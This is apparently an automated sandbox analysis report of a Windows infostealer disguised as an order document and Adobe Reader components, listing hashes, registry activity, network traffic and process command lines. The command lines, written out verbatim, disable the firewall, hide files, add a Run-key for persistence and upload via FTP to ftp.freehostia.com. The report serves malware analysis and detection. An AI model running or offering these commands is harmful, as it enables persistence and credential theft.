| MD5 | 4ce4d01ccc41c2e73643c40abe61aa58 |
| SHA1 | 2dcb3b58de4e71a1febd32f789d5fb36de11cadd |
| SHA256 | 09813ea33c87d6d2a4dec3c294c7c0a28a223b138f8fecb40450d696d8a3fced |
| SHA512 | f54f35d5ed2a2d97a932f7713d80b754233fdc2f343cf79460f1fd3c23363fa418dcc0250ac6826df3dc5754dda0a5ad05c8705603392d2e0ecebb7b2904cbef |
C:\ProgramData\Licenses\086A4C8982A52E70F.Lic
| MD5 | e7edc1e12179070a0970b6c08d1c9df0 |
| SHA1 | e07c94952f278440de2dbd383c63c8a9cd4becc9 |
| SHA256 | 3944d575662eca4075522bc2b50171f75e6e89b3de90fe40fbc3306aff13de16 |
| SHA512 | 1744cf863c6093549269f8d97ca0e04f266f028720cc4219fb62645caecb24c46571c342d802004449b699a29ef3458c6ac96830e239ef9ca103d431320f29be |
C:\ProgramData\TEMP:663565B1
| MD5 | 3179f0e144bed9b21ca54f2e2673b71b |
| SHA1 | c51524b6ac357c2391a38fca97563e389c0109aa |
| SHA256 | b8064f0ce56034748141638e370b11e078ecaa7d26d21cbffaade005cddf66f0 |
| SHA512 | 553d1198b353686e45225bc4865f319b6e257b8296b8be58edca6e52c1aa407790cfb87709833b3e870cb43c08cae8ee093cf046a5b0a9fd7e65c7b3b887f6ec |
memory/2432-184-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/2432-183-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/2432-187-0x0000000002670000-0x000000000287C000-memory.dmp
memory/2432-186-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/2432-185-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/2432-190-0x0000000002670000-0x000000000287C000-memory.dmp
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\112.112
| MD5 | 3c305699054489d4ba953729549294b8 |
| SHA1 | 272b920622013b83dc073c26b75f5968663496c5 |
| SHA256 | 52392e1693a81b409ab85297d0dc90dd360b0fd3ba022341499ab3f23add16d8 |
| SHA512 | 7051b5a88aa709cf6496bddd82c91cc8d198390825c202ec34d1295e1070e62cf92566390dbd083b091a7c83d539d17751790e9cba569f4f566cd90de488000b |
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\011.011
| MD5 | 5de85a4701d0499c44ea2329a9702584 |
| SHA1 | 3481943eb0620234bab8abc19e828d6b6cad5376 |
| SHA256 | 75ecaa7e9ffa3088f19b443f764a28f754c6482a95698a6f3445404ef6dd0272 |
| SHA512 | f1ba3caa447a18611d24bd62e0b8d97e78364a5802a3795f775929bcfc53a3b9250d16d4a5f4c47ebc7c435f6ea8625bad601a5007f3be1f1ea36b3a866eb837 |
memory/2592-197-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/2432-194-0x0000000002670000-0x000000000287C000-memory.dmp
memory/1160-204-0x0000000002660000-0x0000000002917000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-09-17 09:41
Reported
2024-09-17 09:44
Platform
win10v2004-20240802-en
Max time kernel
149s
Max time network
158s
Command Line
Signatures
Banload
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Order details 20160623085712.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe | N/A |
Reads local data of messenger clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeA = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\Adobe Inc\\AdobeRead\\acro4.bat" | C:\Windows\SysWOW64\reg.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Order details 20160623085712.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Order details 20160623085712.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187} | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\ = "C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox.dll" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ProgID | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ProgID\ = "ADOX.Table.6.0" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\VersionIndependentProgID | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ = "ADOX.Table.6.0" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\VersionIndependentProgID\ = "ADOX.Table.6.0" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| File opened for modification | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| File created | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Order details 20160623085712.exe
"C:\Users\Admin\AppData\Local\Temp\Order details 20160623085712.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat" /quiet /passive /norestart"
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adob9.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\rea01.bat" /quiet /passive /norestart"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
Adobeta.exe -a -c -d -natpasv -s:01.klm ftp.freehostia.com -s
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "AdobeA" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\acro4.bat"
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /all
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
adbr01.exe -f "011.011"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
adbr01.exe -f "011.011"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
adbr02.exe -f "112.112"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
adbr02.exe -f "112.112"
C:\Windows\SysWOW64\netsh.exe
netsh firewall set opmode disable
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set currentprofile state off
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set profiles state off
C:\Windows\SysWOW64\netsh.exe
NetSh Advfirewall set allprofiles state off
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
Adobeta.exe -a -c -d -natpasv -s:004.afq ftp.freehostia.com
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe
AReader 5400
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ftp.freehostia.com | udp |
| US | 198.23.57.8:21 | ftp.freehostia.com | tcp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.143.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs
| MD5 | ce8041824149d8266dbb0ad9688224d7 |
| SHA1 | 3ab653c43ce66681ceaab90193e1a4c95d998090 |
| SHA256 | 0a697bf8507b3f517afe7d67ed0f12f1a8d0edbb72252d75cc7677d6e2e638c5 |
| SHA512 | e1a205a1665fe5beb3c53cdcff4eb9c66a4773d730215ff87a179f3c825d342f8f7e8b5e65e45e6a1f13dfe7f58a09f5a920ce9416fe231d74ad1d99e60bd21d |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat
| MD5 | 97410477dc9501dffca4ea4b1ae57273 |
| SHA1 | fb573b3bf4eba734b0f32db1a5b7ff78de36b064 |
| SHA256 | 3836545f759c1ff93892ea0ef81424c8acdef7dc9440e8404bc04662fe7e6f2c |
| SHA512 | 3d22d0bf5375f3cedc7f6bdc0b2fac8de834a1b80567a2395046c5aada74d87e8338fbd0f787b14dbe3f5914c9a751597f1332d89d19f6d96de195ef334cc915 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\004.afq
| MD5 | 7e3ac90901e9c805b04ae5517a642547 |
| SHA1 | b196397ef641ab1b37d3478abed7523ba703de17 |
| SHA256 | 69b2ff2f6434f34617b71fd775f0c67e21798d7e71705f2f5e9d839016c3072a |
| SHA512 | d76e4baa26b7984c97ad53f904bfcd19600ff90d4e28aa9120bfafefd13abf147f0afce3edd6a0ee3a58d7d8c4b89943ff851cdc1ba56e7de3899defcf7bde6f |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\acro4.bat
| MD5 | 89412aba215b6cd18b8a64c4485fa03f |
| SHA1 | 37089346499f54a7d89262a67d95c8764ab3ca1f |
| SHA256 | 9607fb2a0e2ea02cd674272680a238d21539071db3c9735818a1abf11ff30ff1 |
| SHA512 | 7afe571b9ad4b67fdf00cecade8645e82471c1c5098b563a2e2d0cff96905f34b6071eb93c86f59850335e7e88d988d6c016553cdbbe1a693e1cdc3082a3790b |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr01.exe
| MD5 | 3351585db91521d6fa543490ac7cd6a5 |
| SHA1 | 9be2b3abf17613d7386f9949cabaedd466902e82 |
| SHA256 | 3f1749d4a96eb85fe2104fef8d871d9696b456615ff3775d484cc2c2431f40b4 |
| SHA512 | 804b293c02a5526b8c7d5dc48edc18cb33e06a07b39a0b3f46d8d34387e1848b245b087fd820a4a14ac4866c85a120837217ddc9bb47ef32e1b5b80f0dc66d30 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr02.exe
| MD5 | 75a35514185cd2c5cf5aab50cc380963 |
| SHA1 | f1ff1e088f910398a48f4f7dfddec24e6d6d1734 |
| SHA256 | 1cf5eb2f7c5cd5b7d036478d30408212494ab73190172c63df67e66350374937 |
| SHA512 | ca6bb433fe5fd4ea350dfa40dd80bb6913ea4693b6ba6188e67f55e4211db9975fd7af570546bce0fd877a3bfeceadd4da9ba9c46c6cb69f9963914739e16297 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\rea01.bat
| MD5 | ce7ccd3b48dbe8f34db3b2b1222e4fd9 |
| SHA1 | e25f9947c2b250c98dffd7bfeaca75b4db17dcfd |
| SHA256 | 6374a35588bd20362e54dff9e8cf0dffba5ba0ec5952a08fb51caea54c5d228e |
| SHA512 | ee6b389f29d30a572c7c9837575df7ff197589824c5377f02b7c453572139d4ecc75c5b194a601b953fbb7e692b3929faf8c4e14e7fec51cd25d71658636ef99 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\AReader.exe
| MD5 | 1a1075e5e307f3a4b8527110a51ce827 |
| SHA1 | f453838ed21020b7ca059244feea8579e5aa74ef |
| SHA256 | ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5 |
| SHA512 | b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobeta.exe
| MD5 | 97b8dbcc7b3cc290aef4241df911ac2e |
| SHA1 | 733ababbcd278821d4e3ee78580841981f26642e |
| SHA256 | c44ca1fe145c4f0dcea4efb95171cbf16dfec9fe66a603fbe29c94c21050a023 |
| SHA512 | 4adaa7621e2c858e6541792146260142e1d28683ec1515a743a56bc106ab425edfce856ef3b0d146d63704b34694c9e666a39e3845a097d41cbf465537ec9b25 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob9.vbs
| MD5 | 09082253605a7171f078e26dc308a667 |
| SHA1 | 585286c9fcda5e66e7fdb4e17a7bab6160183d46 |
| SHA256 | f4c67dc01ce4bf55e1b574009c49d481dad0d33070f53f42bc76807eb5e324ed |
| SHA512 | adb4a1fec6feada14b8b4f28730e098a0af19f1e7c2fa0fe684030d1171e56c88813661a2352ce598221853fce3dc8a4bb3b2e1dc80b6471c41d2598f635b1d8 |
memory/2972-54-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2608-57-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2608-59-0x0000000002990000-0x0000000002B9C000-memory.dmp
memory/2608-63-0x0000000002990000-0x0000000002B9C000-memory.dmp
memory/2608-73-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2608-72-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2608-74-0x0000000002990000-0x0000000002B9C000-memory.dmp
memory/2608-71-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2608-70-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2608-80-0x0000000002990000-0x0000000002B9C000-memory.dmp
memory/2608-85-0x0000000002990000-0x0000000002B9C000-memory.dmp
memory/1244-91-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/3392-94-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/2972-86-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/3392-100-0x0000000002990000-0x0000000002B9C000-memory.dmp
C:\ProgramData\TEMP\RAIDTest
| MD5 | c2f09542b6c7daf4288f3524c8cebb18 |
| SHA1 | 9430b21baf07f0d105b9ee5fdd9f868418454517 |
| SHA256 | 55d7808233c58f1606fff77eb382a02ed729bf5d8b2640fb313d0f7c91e970d4 |
| SHA512 | dcc19cfbc78b78708ce2586228424194f846d80b6d072045baaf93559d20f71e809a4eb57e7dac3b4ea109d90aeb585d0b5438dc1dd7d34054c03aa6350d6672 |
C:\ProgramData\Licenses\086A4C8982A52E70F.Lic
| MD5 | fe90c4292b7e2f157abd865bc1d590ab |
| SHA1 | 041873453d146fbcf5a375ebadb0957a3afb095c |
| SHA256 | 27648e15ac625b53738c8c2ed0c6eab1daf6ce09723efabaa85c50e2338bdc08 |
| SHA512 | 83d288d67f046bbdbcea6312c397a6b40831bbc1cac265c498920920fbe57e91e02be957b8d5865458abf3086a104e335e1d649de870e485fe673c5bac7cb8f1 |
memory/3392-112-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/3392-113-0x0000000002990000-0x0000000002B9C000-memory.dmp
memory/1244-120-0x0000000000400000-0x00000000006B7000-memory.dmp
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\112.112
| MD5 | 3c305699054489d4ba953729549294b8 |
| SHA1 | 272b920622013b83dc073c26b75f5968663496c5 |
| SHA256 | 52392e1693a81b409ab85297d0dc90dd360b0fd3ba022341499ab3f23add16d8 |
| SHA512 | 7051b5a88aa709cf6496bddd82c91cc8d198390825c202ec34d1295e1070e62cf92566390dbd083b091a7c83d539d17751790e9cba569f4f566cd90de488000b |
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\011.011
| MD5 | b0cc2e6f2d8036c9b5fef218736fa9c9 |
| SHA1 | 64fd3017625979c95ba09d7cbea201010a82f73f |
